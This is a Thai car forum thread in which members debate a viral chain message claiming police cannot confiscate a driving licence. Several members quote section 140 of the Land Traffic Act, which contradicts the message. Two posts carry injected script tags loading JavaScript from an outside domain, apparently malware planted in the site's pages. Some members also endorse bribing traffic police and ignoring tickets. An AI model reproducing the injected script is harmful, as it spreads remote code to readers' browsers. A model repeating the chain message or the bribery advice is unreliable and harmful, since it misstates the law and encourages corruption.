ตอบ
TidTlE

ชื่อเล่น: ติ๊ด

เข้าร่วม: 17 ตุลา 2011
ตอบ: 518

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 444
ให้คำขอบคุณ: 593

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 19 เมษา 2012 22:13 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ตกลงยึดไว้ได้ไหมครับ
ac

ชื่อเล่น: อาร์ม

เข้าร่วม: 16 สิงหา 2011
ตอบ: 302

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 255

สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 19 เมษา 2012 22:14 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
แต่ ผมเพิ่งโดนเมาแล้วขับไปครับ อันนี้เค้ายึดไว้6เดือนเลยครับ(ห้ามขับรถ6เดือน)  ผมว่าแล้วแต่กรณีอย่างกรณีของผมคงเป็นโทษหนักด้วยครับ
mean9322

เข้าร่วม: 06 พฤษภาคม 2010
ตอบ: 200

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 82
ให้คำขอบคุณ: 14

ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พฤหัส, 19 เมษา 2012 22:32 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
bundid43 พิมพ์ว่า:
ไม่ใช่ครับ ตาม พ.ร.บ. จราจรทางบก ๒๕๒๒ เขาบอกว่า เจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่จะเรียกเก็บใบอนุญาตขับขี่ไว้เป็นการชั่วคราวก็ได้ แต่ต้องออกใบรับแทนใบอนุญาตขับขี่ให้แก่ผู้ขับขี่ไว้ และเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ต้องรีบนำใบอนุญาตขับขี่ที่เรียกเก็บไว้ไปส่งมอบพนักงานสอบสวนภายในแปดชั่วโมง นับแต่เวลาที่ออกใบสั่ง ใบรับแทนใบอนุญาตขับขี่
ที่ออกให้ตามวรรคสามให้ใช้แทนใบอนุญาตขับขี่ได้เป็นการชั่วคราวไม่เกินเจ็ดวัน เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่
หรือพนักงานสอบสวนได้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบปรับและผู้ขับขี่ได้ชำระค่าปรับตามที่เปรียบเทียบแล้ว ให้คืน
ใบอนุญาตขับขี่ทันที  
ไม่ใช่ไม่มีอำนาจยึดใบขับขี่ครับ

ผมก็อ่านเหมือนข้างบน มันหมายถึงตร.เอาใบขับขี่เราไปแล้วก็ออกใบสั่งใช้แทนใบขับขี่ให้เรา มันหมายถึงเค้าสามารถยีดใบขับขี่เราได้นี่ครับ
หรือใครสามารถแปลได้เป็นอย่างอื่นครับท่าน จขกท. ที่ท่านเอามาให้อ่านมันก็บอกว่า ตำรวจสามารถยึดใบขับขี่เราได้นี่ครับ
luckratchada

ชื่อเล่น: ลักษณ์

เข้าร่วม: 29 ธันวา 2011
ตอบ: 629

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 304

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 19 เมษา 2012 22:37 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ถามตามหลักแล้วก็มีสิทธิ์ครับ แต่ต้องมีใบสั่งชั่วคราวใช้แทนได้7วัน แต่ตำรวจจะยึกยักรอให้คุณเสนอ.... คงเข้าใจน่ะครับ
maskraiders

ชื่อเล่น: เสริฐ

เข้าร่วม: 06 กุมภา 2012
ตอบ: 44

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 30
ให้คำขอบคุณ: 2

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 19 เมษา 2012 22:47 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
จากที่อ่านคือสามารถยึดได้นะครับ โดยใบที่ออกแทนใบขับขี่คือ ใบสั่งนั้นเอง โดยสามารถใช้แทนใบขับขี่ได้ 7 วัน ตามที่ระบุในกฎหมาย แต่ถ้าเคยขับมอเตอร์ไซต์มาก่อน ตำรวจบางคนเวลาเรียกให้จอดเพื่อขอดูใบขับขี่ แล้วชอบมาถอดกุญแจรถนั้น คุณสามารถ เถียงได้ทันทีเลยนะครับ เพราะตำรวจไม่มีสิทธิ์มาเอาทรัพย์สินภายในรถของเราโดยเด็ดขาด
bomb3092

ชื่อเล่น: บอม

เข้าร่วม: 13 ตุลา 2011
ตอบ: 1116

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 957
ให้คำขอบคุณ: 1379

ปี: 2004
พฤหัส, 19 เมษา 2012 23:02 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ผมว่า  จขกท  พิมผิดไม่ก้ ไม่เข้าใจแล้วมาโพส  แต่ที่ผมรู้จากเพื่อนพ่อที่เป็นตำรวจ มันยึดได้ครับ ใช้ใบสั่งแทนไป ได้นานสุด 7 วัน แต่หลังจากยึดใบสั่งแล้ว โดนเรียกอีก ครั้งที่ 2 ไม่สามารถ จ่ายใบสั่งซ้ำได้ ใบสั่งใบที่ 2 ต้องเชิญตัวไปปรับที่โรงพักในทันทีครับ
mean9322

เข้าร่วม: 06 พฤษภาคม 2010
ตอบ: 200

ได้รับคำขอบคุณ: 82
ให้คำขอบคุณ: 14

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 20 เมษา 2012 00:25 - สงสัยมีอะไรผิดพลาด
bomb3092 พิมพ์ว่า:
ผมว่า  จขกท  พิมผิดไม่ก้ ไม่เข้าใจแล้วมาโพส  แต่ที่ผมรู้จากเพื่อนพ่อที่เป็นตำรวจ มันยึดได้ครับ ใช้ใบสั่งแทนไป ได้นานสุด 7 วัน แต่หลังจากยึดใบสั่งแล้ว โดนเรียกอีก ครั้งที่ 2 ไม่สามารถ จ่ายใบสั่งซ้ำได้ ใบสั่งใบที่ 2 ต้องเชิญตัวไปปรับที่โรงพักในทันทีครับ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ สงสัยมีอะไรผิดพลาด
tsrnty

ชื่อเล่น: อ๊อด

เข้าร่วม: 05 ตุลา 2011
ตอบ: 178

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 45

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 20 เมษา 2012 02:33 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
luckratchada พิมพ์ว่า:
ใบขับขี่แม้เป็นทรัพย์สินของเจ้าของผู้มีชื่อในใบขับขี่ ผู้ใดเอาไปโดยไม่มีสิทธิหรืออำนาจย่อมเป็นความผิดฐานลักทรัพย์
แต่หากการยึดหรือการเอาไปนั้นกระทำโดยมีสิทธิหรือมีอำนาจตามกฎหมาย การเอาไปนั้นย่อมไม่เป็นความผิด สำหรับ
อำนาจของตำรวจจราจรในการยึดใบขับขี่นั้นมีการบัญญัติไว้ในพระราชบัญญัติจราจรทางบก พ.ศ.๒๕๒๒ มาตรา ๑๔๐
มาตรา ๑๔๐ เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่พบว่าผู้ขับขี่ผู้ใดฝ่าฝืนหรือไม่ปฏิบัติตามบทแห่งพระราชบัญญัตินี้
หรือกฎหมายอันเกี่ยวกับรถนั้นๆ จะว่ากล่าว ตักเตือนผู้ขับขี่ หรือออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบก็ได้ ในกรณี
ที่ไม่พบตัวผู้ขับขี่ก็ให้ติดหรือผูกใบสั่งไว้ที่รถที่ผู้ขับขี่เห็นได้ง่าย สำหรับความผิดที่กำหนดไว้ในมาตรา ๑๕๗/๑ มาตรา ๑๕๙
มาตรา ๑๖๐ มาตรา ๑๖๐ ทวิ และมาตรา ๑๖๐ ตรี ห้ามมิให้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบ ในการออกใบสั่งให้ผู้ขับขี่
ชำระค่าปรับตามที่เปรียบเทียบตามวรรคหนึ่ง เจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่จะเรียกเก็บใบอนุญาตขับขี่ไว้เป็นการ
ชั่วคราวก็ได้ แต่ต้องออกใบรับแทนใบอนุญาตขับขี่ให้แก่ผู้ขับขี่ไว้ และเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ต้องรีบนำ
ใบอนุญาตขับขี่ที่เรียกเก็บไว้ไปส่งมอบพนักงานสอบสวนภายในแปดชั่วโมง นับแต่เวลาที่ออกใบสั่ง ใบรับแทนใบอนุญาตขับขี่
ที่ออกให้ตามวรรคสามให้ใช้แทนใบอนุญาตขับขี่ได้เป็นการชั่วคราวไม่เกินเจ็ดวัน เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่
หรือพนักงานสอบสวนได้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบปรับและผู้ขับขี่ได้ชำระค่าปรับตามที่เปรียบเทียบแล้ว ให้คืน
ใบอนุญาตขับขี่ทันที 

อ่านในนี้ยังไง ก็ยึดได้ไม่เกิน 7 วันเเล้ว ออกใบเเทน ชิมิ
siripong

เข้าร่วม: 02 กรกฎา 2009
ตอบ: 3024

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 930
ให้คำขอบคุณ: 3457

ศุกร์, 20 เมษา 2012 06:00 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ใช้ใบแดงหนึ่งใบครับ ไม่อยากเรื่องมากครับ เพราะเราวิ่งขวายาว
tiger2217

ชื่อเล่น: เสือ

เข้าร่วม: 23 ธันวา 2011
ตอบ: 2949

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1500
ให้คำขอบคุณ: 1770

ศุกร์, 20 เมษา 2012 22:38 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
siripong พิมพ์ว่า:
ใช้ใบแดงหนึ่งใบครับ ไม่อยากเรื่องมากครับ เพราะเราวิ่งขวายาว

catsteal

ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

สี: น้ำเงิน วิวิด (มุก) (B-502P)
เสาร์, 21 เมษา 2012 00:02 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ผมให้ใบแดตลอด
itcentre

เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 21 เมษา 2012 19:57 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ยึดได้ครับ แต่ได้ชั่วคราวไม่เกินเจ็ดวัน ตามกระูทู้
แต่ถ้าไม่ให้ยึดเลยเป็นการดีที่สุดครับ
ใบขับขี่ผมยังไม่ผ่านมือตำรวจครับ (แอบดีใจ)
"<script src="https://sport32news.com/civicesgroup.js">
manawwan

ชื่อเล่น: นัท

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 380

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 291

เสาร์, 19 ตุลา 2013 11:04 - ใบขับขี่มีค่า อย่าให้ตำรวจยึด...
เก็บมาฝากจากเพจอยุธยามีด่านบอกด้วย ตามนี้เลยครับ
ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้
มีประโยชน์สำหรับผู้ขับขี่ เมื่อเช้านี้ได้ฟังรายการ บัณทึกสถานะการณ์
ทางวิทยุแห่งประเทศไทยตอน 8.00 น.
วันนี้มีการสัมภาษณ์ คุณจาตุรงค์ ฉายแสง รองนายกรัฐมนครี
เรื่องมาตรการความปลอดภัยในช่วงเทศกาล มีตอนหนึ่งที่ท่านพูดว่า
ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้ ตำรวจออกใบสั่ง
ให้ไปเสียค่าปรับ ถ้าหากยึดใบขับขี่ ถือเป็นการลักทรัพย์
แต่ความเป็นจริงทั้งในอดีตและในปัจจุบันนี้เวลาตำรวจทางหลวงหรือตำรวจจราจร
และแม้แต่ตำรวจสายตรวจ หรือตามด่านต่างๆ เวลาเรียกรถเพื่อตรวจ
มักจะขอดูใบขับขี่ และยึดเอาไป แล้วหาข้อหาให้
บางทีก็ยึดแล้วเดินเข้าป้อมเพื่อให้คนขับรถเข้าไปเจรจา
บางทีก็ยึดโดยไม่ให้ใบสั่งแต่บอกให้ไปเอาที่สถานี
บางทีก็ยึดไปพร้อมออกใบสั่ง เพื่อให้ไปเสียค่าปรับ
ประชาชนส่วนใหญ่งง วิธีการปฏิบัติของตำรวจ ต่อไปถ้าตำรวจจะยึดใบขับขี่ต้องไม่ยอมให้ ไป
ถ้าตำรวจเอาไปจริงๆ ต้องแจ้งความข้อหาลักทรัพย์ เวลาทำผิดกฏจราจร
ตำรวจก็ให้ใบสั่งได้อยู่แล้ว และใบสั่งมีความสำคัญมาก
ผู้รับต้องไปเสียค่าปรับ ถ้าไม่ ไป
ทางราชการก็มีมาตรการที่จัดการอยู่แล้ว เช่นไม่ต่อทะเบียนตัดคะแนน
เมื่อได้อ่าน และรู้เช่นนั้นแล้ว
กรุณาส่งต่อ เพื่อจะได้ไม่ต้องเสียเวลาเสียอารมณ์
ในเวลาขับรถเพื่อความปลอดภัย
นาย ชัยณรงค์ เอื้อสิทธิชัย
รองผู้อำนวยการฝ่าย และผู้บริหาร
ได้รับคำขอบคุณจาก: jjim  honda01  note_okaasan  ATG_12  Rachen  ekdanai  Cool_M 
Joh

เข้าร่วม: 15 ตุลา 2013
ตอบ: 6

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 4
ให้คำขอบคุณ: 0
เสาร์, 19 ตุลา 2013 11:15 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ดีครับจะได้รู้ไว้ใช้
note_okaasan

ชื่อเล่น: สมุดโน้ต

เข้าร่วม: 29 พฤษภาคม 2013
ตอบ: 665

Guru ES
Guru ES

ได้รับคำขอบคุณ: 268
ให้คำขอบคุณ: 665

สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 19 ตุลา 2013 11:17 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
เป็นประโยชน์ดีครับ.....
porche35

ชื่อเล่น: บอย

เข้าร่วม: 22 สิงหา 2013
ตอบ: 1098

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 797
ให้คำขอบคุณ: 329

สี: น้ำเงิน อิเทอนอล (B-96P)
เสาร์, 19 ตุลา 2013 11:27 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
โอ้ว...มันเป็นอะไรที่ล้ำค่ามากคับ...
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 19 ตุลา 2013 11:29 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ขอบคุณมากมายเลยคับ...ว่าแต่จะเถียงพี่แกยังงัย...เดวเรื่องยาว..
ATG_12

ชื่อเล่น: แบงค์

เข้าร่วม: 28 มิถุนา 2011
ตอบ: 364

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 133

สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 19 ตุลา 2013 12:12 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ไปเถียงมันมากเรื่องยาวอีก จะทำไงดี  
pukzone

เข้าร่วม: 11 ตุลา 2011
ตอบ: 721

Guru ES
Guru ES

ได้รับคำขอบคุณ: 708
ให้คำขอบคุณ: 184

สี: น้ำเงิน อิเทอนอล (B-96P)
เสาร์, 19 ตุลา 2013 12:25 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
กฏหมายหรือจะสู้อำนาจ
josho

เข้าร่วม: 25 มิถุนา 2012
ตอบ: 813

Guru ES
Guru ES

ได้รับคำขอบคุณ: 397
ให้คำขอบคุณ: 0

เสาร์, 19 ตุลา 2013 12:26 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
แจ๋วเลย
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 19 ตุลา 2013 13:47 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
เจอบ่อยครับทางหลวง พี่แกไม่ดักใกล้ป้อมที่แกอยู่นะอย่างน้อยก็ย้อนไปเป็นสิบโล แล้วก็ยึดใบขับขี่ไปแล้วบอกกับเราว่าให้ไปจ่ายค่าปรับและรับใบขับขี่ที่ป้อม ถ้ายอมก้อต้งขับรถย้อนไปเสียทั้งเงินค่าปรับค่าน้ำมันเสียเวลา บางครั้งไม่รู้ด้วยว่าป้อมพี่แกอยู่ไหน สรุปคือจะให้จ่ายตรงนั้นแหละแต่ต้องใต้สมุดใบสั่งหรือไม่ก็ขอบกระจกเพื่อแลกใบขับขี่คืน
Vee

ชื่อเล่น: วีครับ

เข้าร่วม: 18 กันยา 2013
ตอบ: 2999

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1210
ให้คำขอบคุณ: 2387

เสาร์, 19 ตุลา 2013 15:34 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ความรู้ทั้งนั้น.....บางอ้อเลย

พุธโคราช

เข้าร่วม: 17 กันยา 2013
ตอบ: 370

ได้รับคำขอบคุณ: 257
ให้คำขอบคุณ: 86

สี: แดง รอยัล รูบี้ (มุก) (R-522P)
เสาร์, 19 ตุลา 2013 16:55 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ahingrace พิมพ์ว่า:
ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!

ใบขับขี่เป็นทรัพย์สิน ! (สำคัญมาก !!!)
>>>ใบขับขี่เป็นทรัพย์สิน
>>>ตำรวจไม่สามารถยึดได้มีประโยชน์สำหรับผู้ขับขี่
>>>เมื่อเช้านี้ได้ฟังรายการ บันทึกสถานะการณ์ทางวิทยุแห่งประเทศไทย ตอน
>>>8.00 น. วันนี้มีการ
>>>สัมภาษณ์
>>> คุณจาตุรงค์ ฉายแสง รองนายกรัฐมนครี
>>>เรื่องมาตรการความปลอดภัยในช่วงเทศกาล มีตอนหนึ่ง
>>>ที่ท่านพูดว่า ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้
>>>ตำรวจออกใบสั่ง ให้ไปเสียค่าปรับ ถ้าหาก
>>>ยึดใบขับขี่ ถือเป็นการลักทรัพย์
>>>แต่ความเป็นจริงทั้งในอดีตและในปัจจุบันนี้ เวลาตำรวจทางหลวง
>>>หรือตำรวจจราจร และแม้แต่ตำรวจสายตรวจ หรือตามด่านต่างๆ
>>>เวลาเรียกรถเพื่อตรวจ มักจะขอดู
>>>ใบขับขี่ และยึดเอาไป แล้วหาข้อหาให้
>>>บางทีก็ยึดแล้วเดินเข้าป้อมเพื่อให้คนขับรถเข้าไปเจรจาบางทีก็ยึดโดย
ไม่ให้ใบสั่งแต่บอกให้ไปเอาที่
>>>สถานี บางทีก็ยึดไปพร้อมออกใบสั่ง
>>>เพื่อให้ไปเสียค่าปรับประชาชนส่วนใหญ่งงวิธีการปฏิบัติของตำรวจ
>>>ต่อ
>>>ไปถ้าตำรวจจะยึดใบขับขี่ ต้องไม่ยอมให้ไป ถ้าตำรวจเอาไปจริงๆ
>>>ต้องแจ้งความข้อหาลักทรัพย์
>>>เวลาทำผิดกฏจราจร ตำรวจก็ให้ใบสั่งได้อยู่แล้ว
>>>และใบสั่งมีความสำคัญมาก ผู้รับต้องไปเสียค่าปรับ
>>>ถ้าไม่ไปทางราชการก็มีมาตรการที่จัดการอยู่แล้ว
>>>เช่นไม่ต่อทะเบียนตัดคะแนน เมื่อได้อ่าน และรู้เช่น
>>>นั้นแล้ว กรุณาส่งต่อ เพื่อจะได้ไม่ต้องเสียเวลาเสียอารมณ์
>>>ในเวลาขับรถ เพื่อความปลอดภัย

ลองดูสิ..ส่วนตัวผมไม่เคยให้และไม่ให้ดูถึงจะขอดู..ก้อบอกอยู่แถวนี้กำลังจะเข้าบ้าน
แต่อย่างว่าแหล่ะครับยังไง..ช่องทางหากินขอใครบางคนแล้วแต่สถานะการณ์ไม่เหมือนกัน...
แม้แต่ใบสั่งก้อไม่ไปเสียด้วย..ก้อไม่เห็นมีไร

แต่เวลาถูกเรียก มันก็ยึดทุกครั้ง กล้าดึงจากมือพี่เขาหรือเปล่าหล่ะครับ เดี๋ยวโดนข้อหาเพิ่มครับ(ขโมยใบขับขี่จากมือเจ้าหน้าที่)

akkarin_c

ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

เสาร์, 19 ตุลา 2013 21:45 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ผมว่าไม่จริงนะ 

ใบขับขี่ เป็นใบอนุญาต ประเภทหนึ่ง เจ้าพนักงานสามารถ ยึด ระงับ หรือเพิกถอน ใบอนุญาตนั้นได้ ตามกฎหมาย

มาตรา ๑๔๐ เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่พบว่าผู้ขับขี่ผู้ใดฝ่าฝืนหรือไม่ปฏิบัติตามบทแห่งพระราชบัญญัตินี้ หรือกฎหมายอันเกี่ยวกับรถนั้นๆ จะว่ากล่าว ตักเตือนผู้ขับขี่ หรือออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบก็ได้ ในกรณีที่ไม่พบตัวผู้ขับขี่ก็ให้ติดหรือผูกใบสั่งไว้ที่รถที่ผู้ขับขี่เห็นได้ง่าย

สำหรับความผิดที่กำหนดไว้ในมาตรา ๑๕๗/๑ มาตรา ๑๕๙ มาตรา ๑๖๐ มาตรา ๑๖๐ ทวิ และมาตรา ๑๖๐ ตรี ห้ามมิให้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบ

ในการออกใบสั่งให้ผู้ขับขี่ชำระค่าปรับตามที่เปรียบเทียบตามวรรคหนึ่ง เจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่จะเรียกเก็บใบอนุญาตขับขี่ไว้เป็นการชั่วคราวก็ได้ แต่ต้องออกใบรับแทนใบอนุญาตขับขี่ให้แก่ผู้ขับขี่ไว้ และเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ต้องรีบนำใบอนุญาตขับขี่ที่เรียกเก็บไว้ไปส่งมอบพนักงานสอบสวนภายในแปดชั่วโมง นับแต่เวลาที่ออกใบสั่ง

ใบรับแทนใบอนุญาตขับขี่ที่ออกให้ตามวรรคสามให้ใช้แทนใบอนุญาตขับขี่ได้เป็นการชั่วคราวไม่เกินเจ็ดวัน เมื่อเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ หรือพนักงานสอบสวนได้ว่ากล่าวตักเตือนหรือทำการเปรียบเทียบปรับและผู้ขับขี่ได้ชำระค่าปรับตามที่เปรียบเทียบแล้ว ให้คืนใบอนุญาตขับขี่ทันที

ในกรณีเจ้าพนักงานจราจรหรือพนักงานเจ้าหน้าที่ออกใบสั่งแต่ไม่พบตัวผู้ขับขี่ ให้สันนิษฐานว่าเจ้าของรถหรือผู้ครอบครองรถเป็นผู้กระทำผิดดังกล่าว เว้นแต่สามารถพิสูจน์ได้ว่าผู้อื่นเป็นผู้ขับขี่

การกำหนดจำนวนค่าปรับตามที่เปรียบเทียบ ให้เป็นไปตามหลักเกณฑ์ที่อธิบดีกำหนด

ใบสั่งและใบรับแทนใบอนุญาตขับขี่ ให้ทำตามแบบที่เจ้าพนักงานจราจรกำหนด”

เอามาจาก Pantip ครับ
bhumipat

ชื่อเล่น: รุจ

เข้าร่วม: 27 พฤษภาคม 2009
ตอบ: 1209

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 3608

จันทร์, 21 ตุลา 2013 09:21 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
...
song

เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

จันทร์, 21 ตุลา 2013 10:07 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ขอบคุณครับ
itcentre

เข้าร่วม: 25 ตุลา 2010
ตอบ: 1154

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1492
ให้คำขอบคุณ: 448

จันทร์, 21 ตุลา 2013 11:24 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
ใช่ครับ ความจริงน่าจะปฏิบัติกันแบบนี้มาตั้งนานแล้ว
Khachi

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
จันทร์, 21 ตุลา 2013 20:40 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
..... สรุปทำไงดีที่สุด
ahingrace

ชื่อเล่น: หนึ่ง

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2984

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6506
ให้คำขอบคุณ: 11382

พุธ, 23 ตุลา 2013 01:23 - ใบขับขี่เป็นทรัพย์สินห้ามให้ตำรวจยึด!
[ทีมข่าว ภาคสนาม ประจำวันที่ 18 ต.ค.56 ***ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้**** ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้ มีประโยชน์สำหรับผู้ขับขี่ เมื่อเช้านี้ได้ฟังรายการ บันทึกสถานะการณ์ ทางวิทยุแห่งประเทศไทยตอน 8.00 น. วันนี้มีการสัมภาษณ์ คุณจาตุรงค์ ฉายแสง รองนายกรัฐมนครี เรื่องมาตรการความปลอดภัยในช่วงเทศกาล มีตอนหนึ่งที่ท่านพูดว่า ใบขับขี่เป็นทรัพย์สิน ตำรวจไม่สามารถยึดได้ ตำรวจออกใบสั่ง ให้ไปเสียค่าปรับ ถ้าหากยึดใบขับขี่ ถือเป็นการลักทรัพย์ แต่ความเป็นจริงทั้งในอดีตและในปัจจุบันนี้เวลาตำรวจทางหลวงหรือตำรวจจราจร และแม้แต่ตำรวจสายตรวจ หรือตามด่านต่างๆ เวลาเรียกรถเพื่อตรวจ มักจะขอดูใบขับขี่ และยึดเอาไป แล้วหาข้อหาให้ บางทีก็ยึดแล้วเดินเข้าป้อมเพื่อให้คนขับรถเข้าไปเจรจา บางทีก็ยึดโดยไม่ให้ใบสั่งแต่บอกให้ไปเอาที่สถานี บางทีก็ยึดไปพร้อมออกใบสั่ง เพื่อให้ไปเสียค่าปรับ ประชาชนส่วนใหญ่ งง วิธีการปฏิบัติของตำรวจ ต่อไปถ้าตำรวจจะยึดใบขับขี่ต้องไม่ยอมให้ ไป ถ้าตำรวจเอาไปจริงๆ ต้องแจ้งความข้อหาลักทรัพย์ เวลาทำผิดกฏจราจร ตำรวจก็ให้ใบสั่งได้อยู่แล้ว และใบสั่งมีความสำคัญมาก ผู้รับต้องไปเสียค่าปรับ ถ้าไม่ ไป ทางราชการก็มีมาตรการที่จัดการอยู่แล้ว เช่นไม่ต่อทะเบียนตัดคะแนน เมื่อได้อ่าน และรู้เช่นนั้นแล้ว กรุณาส่งต่อ เพื่อจะได้ไม่ต้องเสียเวลาเสียอารมณ์ ในเวลาขับรถเพื่อความปลอดภัย ตำรวจจราจรจะมีอำนาจยึดใบขับขี่หรือไม่ จากที่กล่าวมาแล้วข้างต้น จะเห็นว่า ใบขับขี่เป็นกรรมสิทธิ์ของเรา คนอื่นจะมายึดมายุ่งโดยไม่มีอำนาจตามกฎหมายไม่ได้ ดังนั้น หากตำรวจจะยึดใบขับขี่ในกรณีที่เราทำผิดกฎจราจรได้ ก็ต้องค้นหาว่าตำรวจอาศัยอำนาจตามบทบัญญัติใดแห่งกฎหมายที่จะยึดใบขับขี่ ทั้งนี้เพราะหลักกฎหมายทั่วไปมีว่า “เจ้าหน้าที่ของรัฐจะใช้อำนาจกระทบสิทธิและเสรีภาพของบุคคลไม่ได้ เว้นแต่จะอาศัยอำนาจที่กฎหมายบัญญัติไว้” ซึ่งหากไม่มีกฎหมายให้อำนาจไว้ ตำรวจก็จะยึดใบขับขี่ไม่ได้ หากยึดไปโดยไม่มีกฎหมายให้อำนาจก็อาจจะเป็นความผิดฐานลักทรัพย์ได้ อย่างไรก็ดี เมื่อค้นคว้าตัวบทกฎหมายก็พบว่า พระราชบัญญัติจราจรทางบก พ.ศ.๒๕๒๒ บัญญัติไว้ว่า “มาตรา ๑๔๐ 